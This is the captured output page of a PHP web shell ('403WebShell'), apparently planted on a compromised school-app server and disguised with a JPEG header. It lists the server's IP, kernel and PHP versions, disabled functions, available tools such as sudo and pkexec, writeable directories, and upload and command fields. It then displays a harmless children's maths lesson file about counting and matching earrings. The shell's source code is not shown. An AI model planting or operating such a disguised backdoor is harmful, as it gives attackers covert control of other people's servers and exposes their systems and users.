????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.141.164.253
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelD/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelD/Category2/LevelDCat2Lesson1.html
<!DOCTYPE html>
<html>
    <head>
        <title>Circle and match ear rings</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        
        <style type="text/css">
            
            canvas
            {
                border:0px solid #d3d3d3;
                position:absolute;
                display:none;
            }
        
            </style>
        
        <script>
            function page_preLoad()
            {
                shared_setDeviceTypeLevelCategoryLastLesson(Level.D, Category.No2);
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.D, Category.No2, 1), true, true);
                shared_setFooterTable('id_tblFooter', false, false, true, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3', 'id_td_heading4', 'id_td_heading5'];
                var ids_boxes_without_drag_here = ['id_dropBox_no10', 'id_dropBox_no20'];
                var ids_boxes_with_drag_here = ['id_dropBox_imgSquare', 'id_dropBox_imgHeart', 'id_dropBox_imgCircle', 'id_dropBox_imgRectangle', 'id_dropBox_imgSphere'];
                var ids_options = ['id_td_no15', 'id_td_no10', 'id_td_no20', 'id_td_no25'];
                var ids_spans = ['id_span_no15', 'id_span_no10', 'id_span_no20', 'id_span_no25', 'id_span_imgRectangle', 'id_span_imgSphere', 'id_span_imgSquare', 'id_span_imgHeart', 'id_span_imgCircle'];
                var ids_All = ids_headings.concat(ids_boxes_without_drag_here);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);
                shared_adjust_fontSize_for_ids_all_devices(ids_boxes_with_drag_here, 80);
                shared_adjust_fontSize_for_ids_all_devices(ids_options, 80);
                
                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes_without_drag_here);
                shared_init_dropBox_tds_with_drag_here(ids_boxes_with_drag_here);
                shared_init_dropping_spans(ids_spans);
                
                getAllGroupsCanvasIdsArray();
                
                drawCircles();
            }
        
        function page_onLoad()
        {
            
        }
        
        function btnNext_click()
        {
            window.location = 'LevelDCat2Lesson2.html';
        }
        
        function btnHome_click()
        {
            shared_btnHomeCategories_click('LevelD');
        }
        
        function DragDrop(id_dropBox, id_imgElement, ids_array)
        {
            if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
            {
                if (id_imgElement == '')
                {
                    shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                }
                else
                {
                    shared_dragDropImageAndIsMovedTrue(shared_currentDropingId, id_dropBox, id_imgElement);
                }
                
                shared_set_currentDropingId_draggbleToFalse();
            }
            else
            {
                shared_resetCurrentDroppingPosition(id_dropBox);
            }
        }
        
        function drawCircles()
        {
            for (var canvasId = 1; canvasId <= 10; canvasId++)
            {
                shared_canvas_drawCircleWithRadiusPercentageOfTd('id_canvas' + canvasId, 'id_td' + canvasId, 90);
            }
        }
        
        function getAllGroupsCanvasIdsArray()
        {
            var allCanvaseIdsArray = ['id_canvas1', 'id_canvas2', 'id_canvas3', 'id_canvas4', 'id_canvas5', 'id_canvas6', 'id_canvas7', 'id_canvas8', 'id_canvas9', 'id_canvas10'];
            
            shared_allGroupsIdsArrayInArray = [allCanvaseIdsArray];
        }
        
        function td_click(idCanvas)
        {
            shared_canvas_showCircles(idCanvas, shared_allGroupsIdsArrayInArray);
        }
        
        function btnValidate_click()
        {
            var correctCanvasIdsArray = ['id_canvas1', 'id_canvas2', 'id_canvas3', 'id_canvas4', 'id_canvas5', 'id_canvas6', 'id_canvas7', 'id_canvas8', 'id_canvas9', 'id_canvas10'];
            
            var nCorrectCanvas = shared_canvas_validateCanvases(shared_allGroupsIdsArrayInArray, correctCanvasIdsArray);
            
            var ids_boxes = ['id_dropBox_no10', 'id_dropBox_no20', 'id_dropBox_imgSquare', 'id_dropBox_imgHeart', 'id_dropBox_imgCircle', 'id_dropBox_imgRectangle', 'id_dropBox_imgSphere'];
            
            var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes);
            
            if (nCorrectCanvas == 10 && isAllBoxesFilled)
            {
                shared_show_claps_animation('shared_id_div_claps_image');
            }
        }
        
            </script>
    </head>
    
    <body onLoad="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%">
                                    <tr height="45%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                <tr height="10%">
                                                    <td id="id_td_heading1" class="shared_style_options_black_24px_bold" style="border-bottom:none">1. Circle the pair of <span style="color:red">ear</span> rings and count them by 2:</td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr height="50%">
                                                                <td id="id_td1" width="20%" style="text-align:center" onClick="td_click('id_canvas1')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair1Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair1Set1.png" width="40%" height="auto">
                                                                        <canvas id="id_canvas1"></canvas>
                                                                    </span>
                                                                </td>
                                                                <td id="id_td2" width="20%" style="text-align:center" onClick="td_click('id_canvas2')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair2Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair2Set1.png" width="40%" height="auto">
                                                                        <canvas id="id_canvas2"></canvas>
                                                                    </span>
                                                                </td>
                                                                <td id="id_td3" width="20%" style="text-align:center" onClick="td_click('id_canvas3')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair3Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair3Set1.png" width="40%" height="auto">
                                                                        <canvas id="id_canvas3"></canvas>
                                                                    </span>
                                                                </td>
                                                                <td id="id_td4" width="20%" style="text-align:center" onClick="td_click('id_canvas4')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair4Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair4Set1.png" width="30%" height="auto">
                                                                        <canvas id="id_canvas4"></canvas>
                                                                    </span>
                                                                </td>
                                                                <td id="id_td5" width="*" style="text-align:center" onClick="td_click('id_canvas5')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair5Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair5Set1.png" width="35%" height="auto">
                                                                        <canvas id="id_canvas5"></canvas>
                                                                    </span>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td6" width="20%" style="text-align:center" onClick="td_click('id_canvas6')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair6Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair6Set1.png" width="40%" height="auto">
                                                                        <canvas id="id_canvas6"></canvas>
                                                                    </span>
                                                                </td>
                                                                <td id="id_td7" width="20%" style="text-align:center" onClick="td_click('id_canvas7')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair7Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair7Set1.png" width="25%" height="auto">
                                                                        <canvas id="id_canvas7"></canvas>
                                                                    </span>
                                                                </td>
                                                                <td id="id_td8" width="20%" style="text-align:center" onClick="td_click('id_canvas8')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair8Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair8Set1.png" width="35%" height="auto">
                                                                        <canvas id="id_canvas8"></canvas>
                                                                    </span>
                                                                </td>
                                                                <td id="id_td9" width="20%" style="text-align:center" onClick="td_click('id_canvas9')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair9Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair9Set1.png" width="40%" height="auto">
                                                                        <canvas id="id_canvas9"></canvas>
                                                                    </span>
                                                                </td>
                                                                <td id="id_td10" width="*" style="text-align:center" onClick="td_click('id_canvas10')">
                                                                    <span>
                                                                        <img id="id_img_earRingsPair10Set1" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair10Set1.png" width="50%" height="auto">
                                                                        <canvas id="id_canvas10"></canvas>
                                                                    </span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="10%">
                                                    <td style="border-top: 0px">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_heading2" class="shared_style_options_black_24px_bold" width="*">Options:</td>
                                                                <td id="id_td_no15" class="shared_style_red_24px_bold" width="20%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_no15">15</span>
                                                                </td>
                                                                <td id="id_td_no10" class="shared_style_red_24px_bold" width="20%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_no10">10</span>
                                                                </td>
                                                                <td id="id_td_no20" class="shared_style_red_24px_bold" width="20%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_no20">20</span>
                                                                </td>
                                                                <td id="id_td_no25" class="shared_style_red_24px_bold" width="20%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_no25">25</span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="20%">
                                                    <td style="border-top: 0px">
                                                        <table width="100%" height="100%" border="0" cellspacing="1%" cellpadding="0">
                                                            <tr id="id_tr_no10"
                                                                ondragover="shared_highlight('id_dropBox_no10'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_no10')"
                                                                ondrop="DragDrop('id_dropBox_no10', '', ['id_span_no10'])">
                                                                <td id="id_td_heading3" class="shared_style_options_black_24px_bold" width="80%">
                                                                    How many pair of <span style="color:red">ear</span> rings are there?
                                                                </td>
                                                                <td id="id_dropBox_no10" class="shared_style_red_24px_bold" align="center" width="10%">__
                                                                </td>
                                                                <td width="*">&nbsp;</td>
                                                            </tr>
                                                            <tr id="id_tr_no20"
                                                                ondragover="shared_highlight('id_dropBox_no20'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_no20')"
                                                                ondrop="DragDrop('id_dropBox_no20', '', ['id_span_no20'])">
                                                                <td id="id_td_heading4" class="shared_style_options_black_24px_bold" width="80%">
                                                                    How many single <span style="color:red">ear</span> ring is there?
                                                                </td>
                                                                <td id="id_dropBox_no20" class="shared_style_red_24px_bold" width="10%" align="center">__
                                                                </td>
                                                                <td width="*">&nbsp;</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td align="center">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                <tr height="10%">
                                                    <td id="id_td_heading5" class="shared_style_options_black_24px_bold" style="border-bottom:none">2. Match the following <span style="color:red">ear</span> rings with their basic shapes:</td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                            <tr>
                                                                <td width="60%" style="border:none">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr>
                                                                            <td width="*">
                                                                                <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
                                                                                    <tr id="id_tr_imgSquare" height="20%"
                                                                                        ondragover="shared_highlight('id_dropBox_imgSquare'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropBox_imgSquare')"
                                                                                        ondrop="DragDrop('id_dropBox_imgSquare', 'id_img_Square', ['id_span_imgSquare'])">
                                                                                        <td width="60%" align="center">
                                                                                            <img id="id_img_earRingsPair1Set2" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair1Set2.png" width="30%" height="auto">
                                                                                        </td>
                                                                                        <td width="*" id="id_dropBox_imgSquare" class="shared_style_red_24px_bold">
                                                                                        </td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_imgHeart" height="20%"
                                                                                        ondragover="shared_highlight('id_dropBox_imgHeart'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropBox_imgHeart')"
                                                                                        ondrop="DragDrop('id_dropBox_imgHeart', 'id_img_Heart', ['id_span_imgHeart'])">
                                                                                        <td width="60%" align="center">
                                                                                            <img id="id_img_earRingsPair2Set2" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair2Set2.png" width="30%" height="auto">
                                                                                        </td>
                                                                                        <td id="id_dropBox_imgHeart" class="shared_style_red_24px_bold" width="*">
                                                                                        </td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_imgCircle" height="20%"
                                                                                        ondragover="shared_highlight('id_dropBox_imgCircle'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropBox_imgCircle')"
                                                                                        ondrop="DragDrop('id_dropBox_imgCircle', 'id_img_Circle', ['id_span_imgCircle'])"
                                                                                        ondragover="shared_allowDrop(event)">
                                                                                        <td width="60%" align="center">
                                                                                            <img id="id_img_earRingsPair3Set2" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair3Set2.png" width="35%" height="auto">
                                                                                        </td>
                                                                                        <td id="id_dropBox_imgCircle" class="shared_style_red_24px_bold" width="*">
                                                                                        </td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_imgRectangle" height="20%"
                                                                                        ondragover="shared_highlight('id_dropBox_imgRectangle'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropBox_imgRectangle')"
                                                                                        ondrop="DragDrop('id_dropBox_imgRectangle', 'id_img_Rectangle', ['id_span_imgRectangle'])">
                                                                                        <td width="60%" align="center">
                                                                                            <img id="id_img_earRingsPair4Set2" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair4Set2.png" width="30%" height="auto">
                                                                                        </td>
                                                                                        <td id="id_dropBox_imgRectangle" class="shared_style_red_24px_bold" width="*">
                                                                                        </td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_imgSphere" height="*"
                                                                                        ondragover="shared_highlight('id_dropBox_imgSphere'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropBox_imgSphere')"
                                                                                        ondrop="DragDrop('id_dropBox_imgSphere', 'id_img_Sphere', ['id_span_imgSphere'])">
                                                                                        <td width="60%" align="center">
                                                                                            <img id="id_img_earRingsPair5Set2" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/earRingsPair5Set2.png" width="30%" height="auto">
                                                                                        </td>
                                                                                        <td id="id_dropBox_imgSphere" class="shared_style_red_24px_bold" width="*">
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td width="5%">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*" style="border-top:none; border-right:none; border-bottom:none">
                                                                    <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
                                                                        <tr height="20%">
                                                                            <td id="id_td_imgRectangle" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_imgRectangle">
                                                                                    <img id="id_img_Rectangle" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/rectangleShape.png" width="25%" height="auto">
                                                                                        </span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="20%">
                                                                            <td id="id_td_imgSphere" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_imgSphere">
                                                                                    <img id="id_img_Sphere" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/sphereShape.png" width="15%" height="auto">
                                                                                        </span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="20%">
                                                                            <td id="id_td_imgSquare" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_imgSquare">
                                                                                    <img id="id_img_Square" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/squareShape.png" width="18%" height="auto">
                                                                                        </span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="20%">
                                                                            <td id="id_td_imgHeart" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_imgHeart">
                                                                                    <img id="id_img_Heart" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/heartShape.png" width="20%" height="auto">
                                                                                        </span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="*">
                                                                            <td id="id_td_imgCircle" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_imgCircle">
                                                                                    <img id="id_img_Circle" src="../../../img/LevelD/Category2/LevelDCat2Lesson1/circleShape.png" width="16%" height="auto">
                                                                                        </span>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_no15', {handle : 'id_td_no15', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no10', {handle : 'id_td_no10', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no20', {handle : 'id_td_no20', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no25', {handle : 'id_td_no25', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            new webkit_draggable('id_span_imgRectangle', {handle : 'id_td_imgRectangle', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_imgSphere', {handle : 'id_td_imgSphere', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_imgSquare', {handle : 'id_td_imgSquare', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_imgHeart', {handle : 'id_td_imgHeart', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_imgCircle', {handle : 'id_td_imgCircle', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            webkit_drop.add('id_tr_no10', {onOver : function(){shared_highlight('id_dropBox_no10')}, onOut : function(){shared_un_highlight('id_dropBox_no10')}, onDrop : function(){DragDrop('id_dropBox_no10', '', ['id_span_no10'])}});
            webkit_drop.add('id_tr_no20', {onOver : function(){shared_highlight('id_dropBox_no20')}, onOut : function(){shared_un_highlight('id_dropBox_no20')}, onDrop : function(){DragDrop('id_dropBox_no20', '', ['id_span_no20'])}});
            
            webkit_drop.add('id_tr_imgRectangle', {onOver : function(){shared_highlight('id_dropBox_imgRectangle')}, onOut : function(){shared_un_highlight('id_dropBox_imgRectangle')}, onDrop : function(){DragDrop('id_dropBox_imgRectangle', 'id_img_Rectangle', ['id_span_imgRectangle'])}});
            webkit_drop.add('id_tr_imgSphere', {onOver : function(){shared_highlight('id_dropBox_imgSphere')}, onOut : function(){shared_un_highlight('id_dropBox_imgSphere')}, onDrop : function(){DragDrop('id_dropBox_imgSphere', 'id_img_Sphere', ['id_span_imgSphere'])}});
            webkit_drop.add('id_tr_imgSquare', {onOver : function(){shared_highlight('id_dropBox_imgSquare')}, onOut : function(){shared_un_highlight('id_dropBox_imgSquare')}, onDrop : function(){DragDrop('id_dropBox_imgSquare', 'id_img_Square', ['id_span_imgSquare'])}});
            webkit_drop.add('id_tr_imgHeart', {onOver : function(){shared_highlight('id_dropBox_imgHeart')}, onOut : function(){shared_un_highlight('id_dropBox_imgHeart')}, onDrop : function(){DragDrop('id_dropBox_imgHeart', 'id_img_Heart', ['id_span_imgHeart'])}});
            webkit_drop.add('id_tr_imgCircle', {onOver : function(){shared_highlight('id_dropBox_imgCircle')}, onOut : function(){shared_un_highlight('id_dropBox_imgCircle')}, onDrop : function(){DragDrop('id_dropBox_imgCircle', 'id_img_Circle', ['id_span_imgCircle'])}});
            
            </script>
        
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit